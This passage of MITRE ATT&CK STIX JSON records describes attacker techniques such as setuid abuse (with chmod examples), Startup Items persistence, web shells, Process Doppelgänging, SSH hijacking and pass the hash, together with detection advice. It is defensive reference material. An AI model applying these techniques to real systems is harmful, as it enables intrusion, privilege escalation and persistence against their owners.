2017.", "url": "http://www.thesafemac.com/new-signed-malware-called-janicab/"}, {"source_name": "Methods of Mac Malware Persistence", "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"}, {"source_name": "Malware Persistence on OS X", "description": "Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.", "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"}, {"source_name": "Avast Linux Trojan Cron Persistence", "description": "Threat Intelligence Team. (2015, January 6). Linux DDoS Trojan hiding itself with an embedded rootkit. Retrieved January 8, 2018.", "url": "https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Setuid and Setgid", "description": "When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges of the owning user or group respectively (Citation: setuid man page). Normally an application is run in the current user\u2019s context, regardless of which user or group owns the application. There are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn\u2019t need the elevated privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an \"s\" instead of an \"x\" when viewing a file's attributes via ls -l. The chmod program can set these bits with via bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file].\n\nAn adversary can take advantage of this to either do a shell escape or exploit a vulnerability in an application with the setsuid or setgid bits to get code running in a different user\u2019s context. Additionally, adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future (Citation: OSX Keydnap malware).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "1.0", "x_mitre_effective_permissions": ["Administrator", "root"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c0df6533-30ee-4a4a-9c6d-17af5abdf0b2", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1166", "external_id": "T1166"}, {"source_name": "setuid man page", "description": "Michael Kerrisk. (2017, September 15). Linux Programmer's Manual. Retrieved September 21, 2018.", "url": "http://man7.org/linux/man-pages/man2/setuid.2.html"}, {"source_name": "OSX Keydnap malware", "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.", "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Startup Items", "description": "Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.(Citation: Startup Items)\n\nThis is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, /Library/StartupItems isn\u2019t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory. \n\nAn adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist.\n\nMonitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c0dfe7b0-b873-4618-9ff8-53e31f70907f", "created": "2020-01-15T18:00:33.603Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1037/005", "external_id": "T1037.005"}, {"source_name": "Startup Items", "description": "Apple. (2016, September 13). Startup Items. Retrieved July 11, 2017.", "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html"}, {"source_name": "Methods of Mac Malware Persistence", "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Web Shell", "description": "A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013)\n\nWeb shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary's primary access methods are detected and removed.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013)\n\n\n\nNevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running [cmd](https://attack.mitre.org/software/S0106) or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS"], "x_mitre_version": "1.0", "x_mitre_effective_permissions": ["SYSTEM", "User"], "x_mitre_system_requirements": ["Adversary access to Web server with vulnerability or account to upload and serve the Web shell file."], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c16e5409-ee53-4d79-afdc-4099dc9292df", "created": "2017-05-31T21:31:13.061Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1100", "external_id": "T1100"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/650.html", "external_id": "CAPEC-650"}, {"source_name": "Lee 2013", "description": "Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.", "url": "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html"}, {"source_name": "US-CERT Alert TA15-314A Web Shells", "description": "US-CERT. (2015, November 13). Compromised Web Servers and Web Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.", "url": "https://www.us-cert.gov/ncas/alerts/TA15-314A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Process Doppelg\u00e4nging", "description": "Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)\n\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017)\n\nAdversaries may leverage TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055) called Process Doppelg\u00e4nging. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), Process Doppelg\u00e4nging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelg\u00e4nging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017)\n\nProcess Doppelg\u00e4nging is implemented in 4 steps (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017):\n\n* Transact \u2013 Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.\n* Load \u2013 Create a shared section of memory and load the malicious executable.\n* Rollback \u2013 Undo changes to original executable, effectively removing malicious code from the file system.\n* Animate \u2013 Create a process from the tainted section of memory and initiate execution.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelg\u00e4nging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017) (Citation: hasherezade Process Doppelg\u00e4nging Dec 2017)\n\nScan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelg\u00e4nging Dec 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Process whitelisting", "Anti-virus", "Whitelisting by file name or path", "Signature-based detection"], "x_mitre_permissions_required": ["Administrator", "SYSTEM", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c1a452f3-6499-4c12-b7e9-a6a0a102af76", "created": "2018-01-16T16:13:52.465Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1186", "external_id": "T1186"}, {"source_name": "Microsoft TxF", "description": "Microsoft. (n.d.). Transactional NTFS (TxF). Retrieved December 20, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx"}, {"source_name": "Microsoft Basic TxF Concepts", "description": "Microsoft. (n.d.). Basic TxF Concepts. Retrieved December 20, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx"}, {"source_name": "Microsoft Where to use TxF", "description": "Microsoft. (n.d.). When to Use Transactional NTFS. Retrieved December 20, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx"}, {"source_name": "BlackHat Process Doppelg\u00e4nging Dec 2017", "description": "Liberman, T. & Kogan, E. (2017, December 7). Lost in Transaction: Process Doppelg\u00e4nging. Retrieved December 20, 2017.", "url": "https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf"}, {"source_name": "hasherezade Process Doppelg\u00e4nging Dec 2017", "description": "hasherezade. (2017, December 18). Process Doppelg\u00e4nging \u2013 a new way to impersonate a process. Retrieved December 20, 2017.", "url": "https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/"}, {"source_name": "Microsoft PsSetCreateProcessNotifyRoutine routine", "description": "Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved December 20, 2017.", "url": "https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "SSH Hijacking", "description": "Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.\n\nIn order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial. (Citation: Slideshare Abusing SSH) (Citation: SSHjack Blackhat) (Citation: Clockwork SSH Agent Hijacking) Compromising the SSH agent also provides access to intercept SSH credentials. (Citation: Welivesecurity Ebury SSH)\n\n[SSH Hijacking](https://attack.mitre.org/techniques/T1184) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it injects into an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Anastasios Pingios"], "x_mitre_detection": "Use of SSH may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["User", "root"], "x_mitre_system_requirements": ["SSH service enabled, trust relationships configured, established connections"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c1b11bf7-c68e-4fbf-a95b-28efbe7953bb", "created": "2018-01-16T16:13:52.465Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1184", "external_id": "T1184"}, {"source_name": "Slideshare Abusing SSH", "description": "Duarte, H., Morrison, B. (2012). (Mis)trusting and (ab)using ssh. Retrieved January 8, 2018.", "url": "https://www.slideshare.net/morisson/mistrusting-and-abusing-ssh-13526219"}, {"source_name": "SSHjack Blackhat", "description": "Adam Boileau. (2005, August 5). Trust Transience: Post Intrusion SSH Hijacking. Retrieved December 19, 2017.", "url": "https://www.blackhat.com/presentations/bh-usa-05/bh-us-05-boileau.pdf"}, {"source_name": "Clockwork SSH Agent Hijacking", "description": "Beuchler, B. (2012, September 28). SSH Agent Hijacking. Retrieved December 20, 2017.", "url": "https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking"}, {"source_name": "Welivesecurity Ebury SSH", "description": "M.L\u00e9veill\u00e9, M. (2014, February 21). An In-depth Analysis of Linux/Ebury. Retrieved January 8, 2018.", "url": "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "System Language Discovery", "description": "Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.(Citation: Malware System Language Check)\n\nThere are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Query Registry](https://attack.mitre.org/techniques/T1012) and calls to [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: CrowdStrike Ryuk January 2019) \n\nFor example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language or parsing the outputs of Windows API functions GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList and GetUserDefaultLangID.(Citation: Darkside Ransomware Cybereason)(Citation: Securelist JSWorm)(Citation: SecureList SynAck Doppelg\u00e4nging May 2018)\n\nOn a macOS or Linux system, adversaries may query locale to retrieve the value of the $LANG environment variable.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Harshal Tupsamudre, Qualys"], "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system language information. This may include calls to various API functions and interaction with system configuration settings such as the Windows Registry.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19", "created": "2021-08-18T14:06:45.244Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1614/001", "external_id": "T1614.001"}, {"source_name": "Malware System Language Check", "description": "Pierre-Marc Bureau. (2009, January 15). Malware Trying to Avoid Some Countries. Retrieved August 18, 2021.", "url": "https://www.welivesecurity.com/2009/01/15/malware-trying-to-avoid-some-countries/"}, {"source_name": "CrowdStrike Ryuk January 2019", "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.", "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/"}, {"source_name": "Darkside Ransomware Cybereason", "description": "Cybereason Nocturnus. (2021, April 1). Cybereason vs. Darkside Ransomware. Retrieved August 18, 2021.", "url": "https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware"}, {"source_name": "Securelist JSWorm", "description": "Fedor Sinitsyn. (2021, May 25). Evolution of JSWorm Ransomware. Retrieved August 18, 2021.", "url": "https://securelist.com/evolution-of-jsworm-ransomware/102428/"}, {"source_name": "SecureList SynAck Doppelg\u00e4nging May 2018", "description": "Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses the Doppelg\u00e4nging technique. Retrieved May 22, 2018.", "url": "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-09-29T21:07:31.570Z", "name": "Non-Application Layer Protocol", "description": "Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\n\nICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Ryan Becwar", "Duane Michael"], "x_mitre_deprecated": false, "x_mitre_detection": "Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.(Citation: Cisco Blog Legacy Device Attacks)\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) \n\nMonitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS", "Network"], "x_mitre_version": "2.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", "created": "2017-05-31T21:31:10.728Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1095", "external_id": "T1095"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}, {"source_name": "Cisco Synful Knock Evolution", "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.", "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices"}, {"source_name": "Microsoft ICMP", "description": "Microsoft. (n.d.). Internet Control Message Protocol (ICMP) Basics. Retrieved December 1, 2014.", "url": "http://support.microsoft.com/KB/170292"}, {"source_name": "Cisco Blog Legacy Device Attacks", "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"}, {"source_name": "Wikipedia OSI", "description": "Wikipedia. (n.d.). List of network protocols (OSI model). Retrieved December 4, 2014.", "url": "http://en.wikipedia.org/wiki/List_of_network_protocols_%28OSI_model%29"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Pass the Hash", "description": "Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. \n\nWindows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: NSA Spotting)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Travis Smith, Tripwire"], "x_mitre_detection": "Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_system_requirements": ["Requires Microsoft Windows as target system"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c23b740b-a42b-47a1-aec2-9d48ddd547ff", "created": "2017-05-31T21:30:59.339Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1075", "external_id": "T1075"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/644.html", "external_id": "CAPEC-644"}, {"source_name": "NSA Spotting", "description": "National Security Agency/Central Security Service Information Assurance Directorate. (2015, August 7). Spotting the Adversary with Windows Event Log Monitoring. Retrieved September 6, 2018.", "url": "https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2023-10-13T17:57:10.581Z", "name": "Replication Through Removable Media", "description": "Adversaries may move onto systems, such as those separated from the enterprise network, by copying malware to removable media which is inserted into the control systems environment. The adversary may rely on unknowing trusted third parties, such as suppliers or contractors with access privileges, to introduce the removable media. This technique enables initial access to target devices that never connect to untrusted networks, but are physically accessible. \n\nOperators of the German nuclear power plant, Gundremmingen, discovered malware on a facility computer not connected to the internet. (Citation: Kernkraftwerk Gundremmingen April 2016) (Citation: Trend Micro April 2016) The malware included Conficker and W32.Ramnit, which were also found on eighteen removable disk drives in the facility. (Citation: Christoph Steitz, Eric Auchard April 2016) (Citation: Catalin Cimpanu April 2016) (Citation: Peter Dockrill April 2016) (Citation: Lee Mathews April 2016) (Citation: Sean Gallagher April 2016) (Citation: Dark Reading Staff April 2016) The plant has since checked for infection and cleaned up more than 1,000 computers. (Citation: BBC April 2016) An ESET researcher commented that internet disconnection does not guarantee system safety from infection or payload execution. (Citation: ESET April 2016)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["Process: Process Creation", "File: File Creation", "Drive: Drive Creation", "File: File Access"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0847", "external_id": "T0847"}, {"source_name": "BBC April 2016", "description": "BBC 2016, April 28 German nuclear plant hit by computer viruses Retrieved. 2019/10/14 ", "url": "https://www.bbc.com/news/technology-36158606"}, {"source_name": "Catalin Cimpanu April 2016", "description": "Catalin Cimpanu 2016, April 26 Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary Retrieved. 2019/10/14 ", "url": "https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml"}, {"source_name": "Christoph Steitz, Eric Auchard April 2016", "description": "Christoph Steitz, Eric Auchard 2016, April 26 German nuclear plant infected with computer viruses, operator says Retrieved. 2019/10/14 ", "url": "https://www.reuters.com/article/us-nuclearpower-cyber-germany/german-nuclear-plant-infected-with-computer-viruses-operator-says-idUSKCN0XN2OS"}, {"source_name": "Dark Reading Staff April 2016", "description": "Dark Reading Staff 2016, April 28 German Nuclear Power Plant Infected With Malware Retrieved. 2019/10/14 ", "url": "https://www.darkreading.com/endpoint/german-nuclear-power-plant-infected-with-malware/d/d-id/1325298"}, {"source_name": "ESET April 2016", "description": "ESET 2016, April 28 Malware found at a German nuclear power plant Retrieved. 2019/10/14 ", "url": "https://www.welivesecurity.com/2016/04/28/malware-found-german-nuclear-power-plant/"}, {"source_name": "Kernkraftwerk Gundremmingen April 2016", "description": "Kernkraftwerk Gundremmingen 2016, April 25 Detektion von Bro-Schadsoftware an mehreren Rechnern Retrieved. 2019/10/14 ", "url": "https://www.kkw-gundremmingen.de/presse.php?id=571"}, {"source_name": "Lee Mathews April 2016", "description": "Lee Mathews 2016, April 27 German nuclear plant found riddled with Conficker, other viruses Retrieved. 2019/10/14 ", "url": "https://www.geek.com/apps/german-nuclear-plant-found-riddled-with-conficker-other-viruses-1653415/"}, {"source_name": "Peter Dockrill April 2016", "description": "Peter Dockrill 2016, April 28 Multiple Computer Viruses Have Been Discovered in This German Nuclear Plant Retrieved. 2019/10/14 ", "url": 